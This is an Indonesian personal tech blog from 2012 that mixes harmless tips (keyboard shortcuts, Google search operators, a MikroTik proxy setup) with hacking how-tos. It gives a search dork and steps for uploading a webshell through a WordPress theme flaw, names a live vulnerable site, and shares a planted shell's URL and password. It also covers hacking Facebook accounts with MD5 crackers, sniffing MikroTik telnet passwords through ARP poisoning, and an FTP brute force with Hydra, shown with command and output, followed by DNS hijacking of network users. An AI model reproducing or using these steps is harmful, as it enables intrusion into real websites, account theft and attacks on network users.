Mengejar Impian: 2012

Minggu, 03 Juni 2012

Perlengkapan Tempur Untuk Mozilla Dan Beberapa Tambahannya.

Selamat Mencoba Dan Semoga sukses!!!

Saatnya Berkata "Hamdallah"...

Sabtu, 02 Juni 2012

Vulnerability Themes Wordpress.

dork : inurl:/wp-content/themes/WPstore/

kita dapat meng-upload backdoor dengan vulnerability ini:

1. WPStore

2. eShop

3. KidzStore

4. Emporium

5. Store

klo udah dpet target, kita tambah /UPLOAD di target tersebut...
http://www.target.com/wp-content/themes/Wpstore/upload

selanjutnya akan muncul file upload,sekarang kita upload shell kesayangan.... klo udah di upload, tinggal eksekusi shell kita... caranya : http://www.target.com/wp-content/uploads/products_img/namashell.php

selesai dehhh..... sekrang terserah mau di apain tuh sitenya... :D

klo msih bngung, sya ksih live targetnya...http://www.davidsteele.com/wp-content/themes/WPStore/upload/

tinggal upload shell..... klo nt blm pnya shell bsa pke pnya sya..
http://faithinmodernsteel.com/wp-admin/includes/log.php

..passwrd di isi : kerinci

source om Farid Ingin Belajar

Semoga bermanfaat dan selamat mencoba..
Saatnya berkata "HamdallAh"

Rabu, 30 Mei 2012

Cara Menampilkan TaksManager Yang Di Disable.

Kali ini saya akan sedikit berbagi cara menampilkan TaksManager yang di disable.mungkin banyak cara untuk melakukan ini namun saya akan berbagi salah satunya...

Langsung saja ya...untuk menampikan TaksManager yang di disable,yang harus kita persiapkan adalah Anti virus Smadav..

Langkah :

1. Install dulu smadav-nya..

2.Lalu jika sudah selesai install masuk ke smandav lalu pilih Tool..

3. Jika sudah pilih Tool akan ada menu di bawah lalu pilih Win-Force..

4.Di sini anda akan menemukan beberapa pitur pilihan yang bisa anda manfaatkan selain membuka TaksManager yang di disable..Chayooo,,

Silahkan mencoba dan chayooo......

Saatnya berkata "HamdalLAh"

Selasa, 29 Mei 2012

Keyloger Ringan Anti Detektor.

Iseng main2 ke salah satu site terkemuka malah nemu yang ginian..ya lumyan buat bantu agan-agan ama om-om yang mau protek ama kompinya,,,ukuranya lumayan ringan om cuma 5 kb..dengan kemampuan yang memuaskan untuk sekedar melindungi kompinya agan-agan ama om-om ini...cuman keyloger ini hanya bekerja untuk merekam aktifitas browsing doank om...gak bisa buat full aktifitasnya si kompi,,,bekerja pada mozzila dengan add-ons nya..

silahkan sedot gan diSini (https://addons.mozilla.org/id/firefox/addon/keylogger-220858/)
Nah setelah om install...ketik Alt+L nah di sini om akan di minta mengisi pass login,..jangan sampe lupa ya om,,dan ketika om mau buka keylogernya juga om keikan Alt+L isi dengan Passnya om,,dan masuk deh...tabel lognya...namun setelah om tutup tabel lognya secara otomatis tabel tadi akan terhupus untuk mengihdari penyalah gunaan dari orang yang gak berhak,makanya kalo ada data log tang sekiranya penting om pindahin dulu deh...ok...

silahkan mencoba om,,,dan semoga berhasil...

Source

Saatnya berkata"HamdalLah"

Selasa, 22 Mei 2012

Kombinasi Tombol Pada Keyboard.

Kombinasi tombol keyboard adalah kombinasi antara satu tombol dengan tombol lain pada keyboard untuk menampilkan satu perintah tanpa mengklik icon atau aplikasi tersebut.cara ini cukup epektif dimana kita ada kendala dengan mouse atau karena berbagai alasan lain.

Nah..Sekarang saya akan memposting sedikit kombinasi tersebut yang mungkin belum cukup lengkap dan masih banyak kekurangan di sana-sini oleh karena itu masukan dari rekan-rekan sekalian akan sangat membantu.

Tanpa banyak basa-basi silahkan :

Fungsi kombinasi tombol Ctrl (A – Z) Dll.

1. CTRL + A = memblok seluruhan teks
2. CTRL + B = menebalkan teks
3. CTRL + C = meng Copy teks
4. CTRL + D = membuka menu/kotak dialog Font
5. CTRL + E = meratakan teks ke tengah
6. CTRL + F = membuka menu/kotak dialog Find and Replace
7. CTRL + G = membuka menu/kotak dialog Find and Replace
8. CTRL + H = membuka menu/kotak dialog Find and Replace (tab Replace)
9. CTRL + I = membuat format teks menjadi miring
10. CTRL + J = membuat format teks menjadi rata kanan & kiri
11. CTRL + K = membuka menu/kotak dialog Insert Hyperlink
12. CTRL + L = membuat format teks menjadi rata kiri
13. CTRL + M = menggeser First Line Indent dan Left Tab pada mistar dokumen
14. CTRL + N = membuka/membuat dokumen baru
15. CTRL + O = membuka menu/kotak dialog Open
16. CTRL + P = membuka menu/kotak dialog Print
17. CTRL + Q = menghilangkan nomor urut
18. CTRL + R = membuat format teks menjadi rata kanan
19. CTRL + S = menyimpan dokumen
20. CTRL + T = menggeser Left Tab pada mistar dokumen
21. CTRL + U = membuat format teks menjadi bergaris bawah
22. CTRL + V = menampilkan hasil teks yang sudah di copy atau cut
23. CTRL + W = menyimpan dan langsung menutup program ms. Office yang di pakai
24. CTRL + X = memotong teks (teks terlebih dahulu di blok)
25. CTRL + Y = mengulang/meneruskan kembali aktivitas yang dibatalkan
26. CTRL + Z = membatalkan aktivitas terakhir.
27. CTRL+SHIFT = dengan berbagai tombol arah (menunjukkan daerah yang diblok)
28. CTRL+SHIFT = sementara drag sebuah item (menciptakan shortcut)
29. CTRL + SHIFT + A = Memformat huruf menjadi besar semua (capital)
30. CTRL + SHIFT + D = Memberi garis bawah ganda pada teks
31. Ctrl + Shift + F = Mengubah Font
32. Ctrl + Shift + H = Membuat teks yang tersembunyi
33. Ctrl + Shift + K = Memformat huruf menjadi huruf besar tetapi berukuran kecil
34. Ctrl + Shift + P = Mengubah ukuran huruf
35. Ctrl + Shift + W = Menggaris bawahi kata tanpa spasi
36. Ctrl + Shift + Q = Mengubah font menjadi symbol terakhir
37. Ctrl + Shift + < = Mengurangi ukuran huruf
38. Crtl + Shift + > = Memperbesar ukuran huruf
39. Ctrl + Shift + “+” = (tanpa tanda kutip) Membuat format teks superscript
40. CTRL+SHIFT+TAB = (mundur ke tab sebelum)
41. Ctrl + Backspace = Menghapus ke kiri satu kata
42. Ctrl + Delete = Menghapus ke kanan satu kata
43. Ctrl + ] = Menambah ukuran font per 1 point
44. Ctrl + [ = Mengurangi ukuran font per 1 point
45. Ctrl + Spacebar = Menghilangkan format karakter manual
46. CTRL+HOME = (menuju karakter pertama)
47. CTRL+END = (menuju karakter terakhir)
48. CTRL+TAB = (maju ke tab berikut)
49. CTRL+RIGHT ARROW = (memindah kursor ke huruf selanjutnya)
50. CTRL+LEFT ARROW = (memindah kursor ke awal huruf)
51. CTRL+DOWN ARROW = (memindah kursor ke awal paragraf)
52. CTRL+UP ARROW = (memindah kursor ke posisi paragraf sebelumnya)
53. CTRL+ESC = (menampilkan menu Start)
54. CTRL+F4 = (menutup dokumen yang aktif pada dokumen yang banyak dibuka)
55. CTRL+F10 = (Maximize windows yang aktif).
56. CTRL+Windows Logo+F = (pencarian komputer terutama dalam suatu jaringan)
57. ALT+ENTER = (melihat properties dari item yang dipilih)
58. ALT+F4 = (menutup program yang aktif)
59. ALT+ENTER = (menunjukkan properties dari object yang terpilih)
60. ALT+SPACEBAR = (membuka shortcut pada windows yang aktif)
61. ALT+TAB = (memindah item-item yang aktif)
62. ALT+ESC = (urutan item yang telah dibuka)
63. Alt + Ctrl + S = Memecah jendela dokumen
64. Alt + Shift + C = Mengembalikan dokumen setelah dipecah
65. Alt + Ctrl + Y = Mengulangi pencarian (setelah menutup jendela Find and Replace
66. Alt + Ctrl + Home = Melakukan penelusuran melalui sebuah dokumen
67. Alt + Ctrl + P = Mengubah ke print layout view
68. Alt + Ctrl + O = Mengubah outline view
69. ALT+SPACEBAR = (menampilkan menu MMC window)
70. ALT+F4 = (menutup tampilan window)
71. ALT+A = (menampilkaActionmenu)
72. ALT+V = (menampilkan View menu)
73. ALT+F = (menampilkan the File menu)
74. ALT+Minus sign (-) = (menampilkan menu windows yang aktif)
75. ALT+O = (menampilkan the Favorites menu)
76. Alt + Ctrl + N = Mengubah normal view
77. Backspace = Menghapus ke kiri satu karakter
78. Delete = Menghapus ke kanan satu karakter
79. Shift + F3 = Mengubah besar kecilnya huruf
80. DELETE (Delete)SHIFT+DELETE = (menghapus permanen)
81. F2 key = (merubah nama dari item yang dipilih)
82. F3 key = (pencarian folder atau file)
83. F6 key = (elemen-elemen layar pada desktop)
84. F4 key = (memunculkan Address bar pada My Computer atau Windows Explorer)
85. SHIFT+F10 = (memunculkan shortchut sesuai ikon yang dipilih)
86. F10 key = (mengaktifkan menu bar program yang sedang aktif)
87. RIGHT ARROW = (membuka sebuah submenu terutama menu lanjutan sebelah kanan)
88. LEFT ARROW = (membuka sebuah submenu terutama menu lanjutan sebelah kiri)
89. F5 key = (Update active window)
90. BACKSPACE = (kembali ke direktori sebelumnya di My Computer atau Windows Explorer)
91. ESC = (membatalkan proses suuatu eksekusi program)
92. SHIFT memasukkan CD-ROM ke dalam CDROM drive (mencegah CD-ROM dari running otomatis)
93. TAB = (maju tab berdasarkan pilihan)
94. SHIFT+TAB = (mundur pada suatu pilihan menu)
95. ALT+huruf yang diUnderlined = (lakukan perintah sesuai dengan opsi yang dipilih)
96. ENTER = (lakukan perintah atau tombol untuk pelaksana perintah)
97. SPACEBAR = (memilih atau mengosongkan check box pada menu aktif pada check box)
98. Arrow keys = (menyorot suatu karakter)
99. F1 key = (menampilkan Help)
100. F4 key = (menampilkan item pada daftar yang aktif)
101. BACKSPACE = (kembali ke direktori awal)
102. Windows Logo = (menampilkan atau menyembunyikan Start menu)
103. Windows Logo+BREAK = (menampilkan System Properties dialog box)
104. Windows Logo+D = (menampilkan desktop)
105. Windows Logo+M = (Minimize semua windows)
106. Windows Logo+SHIFT+M = (Restore minimized windows)
107. Windows Logo+E = (membuka My Computer)
108. Windows Logo+F = (mencari sebuah file atau folder)
109. Windows Logo+F1 = (menampilkan Windows Help and Support)
110. Windows Logo+ L = (lock windows)
111. Windows Logo+R = (membuka Run)
112. Windows Logo+U = (membuka Utility Manager) Accessibility Keyboard Shortcuts
113. SHIFT kanan selama delapan detik = (menyalakan FilterKeys baik on atau off)
114. Left ALT+left SHIFT+PRINT SCREEN = (menyalakan High Contrast baik on atau off)
115. Left ALT+left SHIFT+NUM LOCK = (menyalakan MouseKeys baik on atau off)
116. SHIFT lima kali = (mengaktifkan StickyKeys)
117. NUM LOCK selama 5 detik = (mengaktifkan ToggleKeys)
118. Windows Logo +U = (membuka Utility Manager)
119. END = (menampilkan isi windows yang aktif paling bawah)
120. HOME = (menampilkan isi windows yang aktif paling atas)
121. NUM LOCK+Tanda Asterisk (*) = (menampilkan daftar subfolder pada folder yang dipilih)
122. NUM LOCK+tanda plus (+) = (menampilkan daftar dari isi suatu folder)
123. NUM LOCK+tanda minus (-) = (menutup folder yang dipilih)
124. LEFT ARROW = (pilih folder induk )
125. RIGHT ARROW = (memilih subfolder pertama)
126. RIGHT ARROW = (memulai baris baru)
127. LEFT ARROW = (menujunpada akhir baris sebelumnya)
128. UP ARROW = (naik satu baris)
129. DOWN ARROW = (turun satu baris)
130. PAGE UP = (naik satu layar)
131. PAGE DOWN = (turun satu layar)
132. HOME = (menuju awal suatu baris)
133. END = (menuju akhir suatu baris)
134. SPACEBAR = (memilih antar Enlarged and Normal mode ketika karakter disorot)
135. F5 key = (Update isi semua console windows)
136. MMC Console Window Keyboard Shortcuts
137. SHIFT+F10 = (menampilkan menu opsi dari program yang aktif)
138. F1 key = (membuka Help menu)
139. F5 key = (reload, update isi dari suatu dokumen)
140. CTRL+F10 (Maximize windows yang aktif)

Semoga Bisa membantu...
Saatnya berkata"HamdalLah"..

Virus Cinta (LIA I LOVE YOU.exe)

Mungkin judulnya terlalu kamseupay...tapi memang nama itu yang pantas untuk virus yang satu ini..virus ini berada dalam tingkatan virus yang menengah tidak berbahaya namun merugikan... virus ini bekerja dengan cara menggandakan diri sama seperti virus kebanyakan,membuat ruang harddisk atau flashdisk terbuang percuma.semakin banyak folder maka semakin banyak juga virus ini berkembang.

Nama : LIA I LOVE YOU.exe
Icon : Bola dunia
Comviled by : Visual Basic 6.0

Registry yang dimodifikasi virus:
=> gpmce
-HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
-VB.LIA.I.L.Y Virus Value
=> gpmce
-HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
-VB.LIA.I.L.Y Virus Value
=> System
-HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\System
-Forbidden Key
=> LocalizedString
-HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
-Different String Value
=> (Default)
-HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\DefaultIcon
-Different String Value
=> LocalizedString
-HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}
-Different String Value
=> Empty
-HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\DefaultIcon
-Different String Value
=> Full
-HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\DefaultIcon
-Different String Value
=> DisableTaskMgr
-HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
-Forbidden DWORD Value
=> DisableRegistryTools
-HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
-Forbidden DWORD Value
=> NoFolderOptions
-HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
-Forbidden DWORD Value
=> DisableThumbnailCache
-HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
-Different DWORD Value.

Perbedaan penggandaan dan starter virus ini ada pada masalah penamaan file. karena virus menggunakan nama starter nya adalah nama dirinya (LIA I LOVE YOU.exe) namun dalam menggandakan di folder lain mengunakan nama folder yang di susupinya sehingga kita dapat membedakan mana yang induk dan gandaannya,

Senin, 21 Mei 2012

Aplikasi Athan Versi Online..

Berdiam diri di depan komputer itu bak kita diam di depan perempuan yang kita sayang,,gak inget waktu sering kita alami,sehingga membuat kita melewatkan janji atau apa,,,cuman yang paling parah adalah sampe kita melewatkan kewajiban kita selaku muslim yaitu "Shalat Lima waktu"wah,,,,jangan sampe deh om...sebab bukan pahala yang kta dapatkan dari pekerjaan kita malah dosa dan madharat....semoga kita di jauhkan dari hal itu ya om...amin.... :)

Langsung aja deh om...silahkan sedot Sini....
Nah kalo Om-om ini pengen ke site aslinya bisa juga om biar om dapat versi terupdate nya....Silahkan Sini...

Silahkan Donload ya om,,semoga bermanfaat..maaf jika ada yang salah.."Kesempurnaan hanya milik Allah Tuhan semesta alam..

Saatnya berkata"HAmdallah".. :)

Minggu, 20 Mei 2012

Melacak No Hp Dengan Menggunakan HLR Lookup

Home Location Register(HLR) adalah database center yang berisi rincian dari setiap pelanggan telepon selular yang diberi wewenang untuk menggunakan jaringan inti GSM. HLR menyimpan rincian setiap kartu SIM yang dikeluarkan oleh operator telepon seluler. Setiap SIM memiliki identifikasi unik yang disebut IMSI yang merupakan kunci utama untuk setiap record HLR.

Sedangkan HLR Lookup adalah sebuah aplikasi untuk memeriksa di mana nomor telepon yang berasal.HLR Lookup tidak memiliki kemampuan untuk mengetahui rincian sejumlah informasi seperti nama, alamat, posisi, dll, karena maslah privacy dan keamanan maka informasi yang rinci tentang pemilik nomor yang hanya diketahui oleh karyawan pemilik operator telepon seluler dan pihak berwenang .

Dengan menggunakan HLR Lookup kita dapat melacak lokasi (kota) sebuah nomor hp.
HLR Lookup ini hanya bisa mendeteksi no hp operator ponsel berikut:

1. Telekomunikasi Selular [Kartu Halo, Simpati, Kartu AS]
2. Indosat (Cellular) [IM3, Mentari, Matrix]
3. Indosat (Fixed) [Starone]
4. Excelcomindo Pratama [XL]
5. Hutchison CP Telecommunications [Three]
6. Natrindo Telepon Seluler [Axis]
7. Bakrie Telecom [Esia]
8. Telekomunikasi Indonesia [PSTN, Flexi]
9. Mobile-8 Telecom (Cellular) [Fren]
10. Mobile-8 Telecom (Fixed) [Hepi]
11. Smart Telecom [Smart]
12. Sampoerna Telekomunikasi Indonesia [Ceria]
13. Pasifik Satelit Nusantara [Byru]

Untuk mendeteksi lokasi no hp bisa gunakan link berikut Sini
Untuk menggunakannya cukup masukkan nomor hp ke kotak teks yang tersedia kemudian klik tombol Search , maka akan terdeteksi lokasi nomor hp tersebut lengkap dengan peta.

"Source"

Saatnya berkata "HamdalLah".....
Semoga bermanpaat...

Hack Facebook Menggunakan Metode MD5 Dan Software

HAck Facebook adalah hal yang sedang marak sekarang...di sebut marak karena sekarang banyak orang yang mengingin kan hal itu,,etah itu Fb pacarnya,kawannya,sekedar iseng atau bahkan Fb musuhnya....

Banyak cara untuk menghack Fb.salah satunya dengan mengunakan Md5 dan beberapa software...metode Md5 sering di gunakan dengan cara melihat Hash password yang ada pada cached....dan untuk melindungi siri anda dari hal ini,,biasakan setelah anda browsing..bersihkanlah riwayat dan cached yang tersimpan pada browser.///....

Untuk melakukan Hack dengan metode ini anda membutuhkan software berikut :
1. Software MD5-Cain-Rainbowcrack-Win Md5
2. Md5-CRC VIrus And Worm
3. tool check hash Md5
4. Crack Md5 Password_by Cain.
5. Md5_hash Bruter_V4.0

<silahkan di coba>
"Saatnya berkata"HamdalLah"....

Sabtu, 12 Mei 2012

Link-Link berbahayaa

Agan mungkin,,,Sering ketemu ama promosi baik barang atau jasa yang mengharuskan kita mengklik link tersebut(sudah pasti ya..hi..i..)...

Bukan itu si masalanya gan,,,cuman kita harus hati-hati tentang link2 tersebut karena siapa tau link tersebut mengarahkan kita ke site yang sudah terinfeksi..yang mengakibatkan komputer kita terkena virus,,,nah untuk meminimalisir kita menjadi korban sebaiknya sebelum kita mengKlik link tersebut sebaiknya kita melakukan scanner terlebih dahulu link tersebut dengan Link online scaneer cebagai berikut :

https://www.virustotal.com/#url

http://www.avg.com.au/resources/web-page-scanner/

http://onlinelinkscan.com/

Ingat Gan mencegah lebih baik dari pada menyervis....hi..hi..

"Saatnya berkata HamdallLAh"

Kamis, 03 Mei 2012

Perintah-Perintah Yang Terdapat Di Google.

Untuk Agan2 yang sering nongkrong di Mbah Google pasti udah gak asing lagi ama perintah2 ini,Namun kadang kala kita lupa dan belum mengetahi semua perintah yang ada di google,oleh karena itu saya bermaksud shering beberapa perintah yang saya ketahui yang insaalloh membantu....

intitle [syntax = intitle:Operator]
contoh = intitle:hack

inurl [inurl:Operator]
contoh = passwd inurl:www.kombor.com

filetype [filetype:Operator]contoh = resep filetype:pdf

link [link:URL]
contoh = link:lephex.blogspot.com

Site [Site:domain]
contoh = hacker site:org

Related [related:URL]
contoh = related:www.xcode.or.id

Phonebook [Phonebook:Operator]
contoh = phonebook:lephex+indonesia

Intext [intext:Operator]
Contoh = intext:masak

Cache [cache:URL (Hghlight) ]
contoh = cache:lephex.blogspot.com

Info [info:URL]
contoh = info:lephex.blogspot.com

Allintitle [Allintitle:(operator1)(operator2)...(operator n-1)]
contoh = allintitle:intel amd mac

allinurl [allinurl:(operator1)(operator2)...(operator n-1)]
contoh = allinurl:lephex intel

Allintext [allintext:(operator1)(operator2)...(operator n-1)]
contoh allntext:lephex pengertian

"Sempga bisa membantu agan semua dan selamat mencoba"
Saatnya berkata"Allhamdulillah"

Selasa, 01 Mei 2012

Hacking Password Mikrotik via cela pada telnet

Perkembangan remote untuk administrator sudah berkembang pesat, tapi tidak menutup kemungkinan ada administrator mikrotik yang masih menggunakan telnet untuk remote ke mikrotiknya dengan berbagai alasannya seperti misal lebih universal, seperti dimana di windows sudah ada telnet clientnya yang dapat dipanggil tanpa menggunakan tool dari luar dan sebagainya.

Penggunaan telnet pada mikrotik dapat mengakibatkan password mikrotik di sniffing.

Contoh yang penulis lakukan dalam melakukan sniffing password telnet dengan CAIN.

Setelah penulis melakukan poisoning pada IP router mikrotik dan kemudian si administrator melakukan login ke mikrotik melalui telnet, penulis cukup masuk pada bagian passwords lalu telnet akan tampil baris seperti dibawah ini lalu penulis lakukan klik kanan lalu view.

Tampilannya setelah dilakukan view.

Binggo, anda telah mendapatkan password mikrotik dan anda tinggal login dengan password tersebut untuk melakukan login.

Untuk mencegah terjadinya tindakan pengambilan password dengan menggunakan sniffing maka gunakan SSH untuk remote secara console. Cayoo.

Oleh Kurniawan

Hack Mikrotik Langsung Via BF

Tidak ada sistem yang aman 100%, karena begitu banyak kemungkinan jika kita melihat dari berbagai sisi, sebelumnya penulis menulis artikel untuk hacking mikrotik dari sisi celah di telnet, tapi sebenarnya sama bahayanya dengan telnet yaitu FTP.

Percobaan penulis melakukan serangan BF (brute force) pada http, telnet dan ssh mengalami kegagalan, setelah termenung sekian lama ahkirnya penulis ingat serangan BF pada FTP di waktu sebelumnya, ahkirnya penulis mencoba melakukan BF pada FTP dan hasilnya ternyata bisa. Hmm username dan password untuk http, telnet, ssh, telnet adalah sama, satu celah kena maka semua kena, jadi?

Dari sisi kompatibilitas mikrotik dapat diancungi jempol tapi akibat dari banyaknya kompatibilitas yang ada dapat membawa ancaman lebih besar, seperti pada telnet yang penulis bahas dan praktek diartikel yang sebelumnya.

Oke, kita langsung praktek saja, kita periksa port yang terbuka di mikrotik

C:\Documents and Settings\serverdata>nmap -A 192.168.1.174

Starting Nmap 5.21 ( http://nmap.org ) at 2011-11-07 15:36 Pacific Standard Time

Nmap scan report for 192.168.1.174
Host is up (0.00013s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE    VERSION
21/tcp   open ftp        MikroTik router ftpd 3.20
22/tcp   open ssh        OpenSSH 2.3.0 mikrotik 2.9 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey: 1024 c6:5e:04:d3:12:db:1d:98:c9:17:e2:98:77:d4:39:ba (RSA1)
|_1024 76:68:bc:ee:e3:40:f5:6b:72:ea:44:55:df:86:06:ec (DSA)
23/tcp   open telnet     Linux telnetd
80/tcp   open http       MikroTik router http config
|_html-title: mikrotik routeros > administration
2000/tcp open winbox     MikroTik WinBox management console
8080/tcp open http-proxy Mikrotik http proxy
8291/tcp open unknown
MAC Address: 08:00:27:22:84:F1 (Cadmus Computer Systems)
Device type: media device
Running: Chumby embedded
OS details: Chumby Internet radio
Network Distance: 1 hop
Service Info: OS: Linux; Device: router

HOP RTT ADDRESS
1 0.13 ms 192.168.1.174

OS and Service detection performed. Please report any incorrect results at http:
//nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 170.00 seconds

Ternyata banyak port dan service yang terbuka di mikrotik.

Oke tidak perlu berpanjang-panjang lebar lagi, kita langsung hack saja mikrotik target.

C:\Documents and Settings\serverdata>

H:\hydra>hydra -l admin -P kamus.txt 192.168.1.174 ftp
Hydra v6.0 (c) 2011 by van Hauser / THC – use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2011-11-07 14:39:20
[DATA] 16 tasks, 1 servers, 23 login tries (l:1/p:23), ~1 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 192.168.1.174 login: admin password: jagoan
[STATUS] attack finished for 192.168.1.174 (waiting for childs to finish)
Hydra (http://www.thc.org) finished at 2011-11-07 14:39:26

Binggo, password mikrotik sudah didapat, kita coba masuk lewat web.

Saat login dan exploitasi yang dapat dilakukan.

Menghajar para pengguna jaringan di mikrotik dengan mengarahkan DNS Servernya ke DNS Server milik kita, ya samalah tekniknya dengan teknik di artikel sebelumnya yang penulis tulis untuk poisoning DNS para pengguna yang menggunakan DHCP router.

Ingin dapat bandwidth full ?

Terbatas di web, pakai winbox saja dan login pakai pakai password yang kita hack dari FTP sebelumnya biar lebih banyak option lagi, jika ingin mengganti password router password mikrotik di winbox maka contohnya klik saja password dan muncul form input untuk password lama dan password baru.

Oke, sekian dulu, cayooo.

Oleh Kurniawan – yk_family_code@yahoo.com

Kamis, 26 April 2012

Membuat Proxy Menggunakan Mikrotik

Mikrotik sering digunakan untuk proxy pula. Maka Disini kita akan belajar mengkonfigurasi proxy menggunakan mikrotik. Jika dulu anda pernah belajar konfigurasi proxy menggunakan debian yang begitu rumit dan banyak errornya jika anda tidak teliti. Kali ini saya jamin, tidak ada hal yang membuat anda merasa bingung. Check this out

1. ip proxy set enable=yes

2. ip proxy set max-cache-size=unlimited

3. ip firewall nat add chain=dstnat protocol=tcp dst-port=80 action=redirect to-port=3128

4. ip proxy set cache-administrator=”www.situstkj.co.cc@gmail.com”

5. ip proxy access add src-address=0.0.0.0/0 dst-host=*.facebook.com action=deny
(guna script di atas adalah untuk memblokir akses ke facebook)

6. ip proxy access add path=*.3gp action=deny
(guna script di atas adalah untuk memblokir download yang berupa konten video 3gp)

7. ip proxy print

8. ip proxy access print

9. ip proxy monitor (untuk monitoring)

Mudah bukan, pakek mikrotik itu simple banget kok.

Semoga "Sukses And Good Luck"

Saatnya Berkata :"HamdalLah"

Share By http://b-compi.net

Mengejar Impian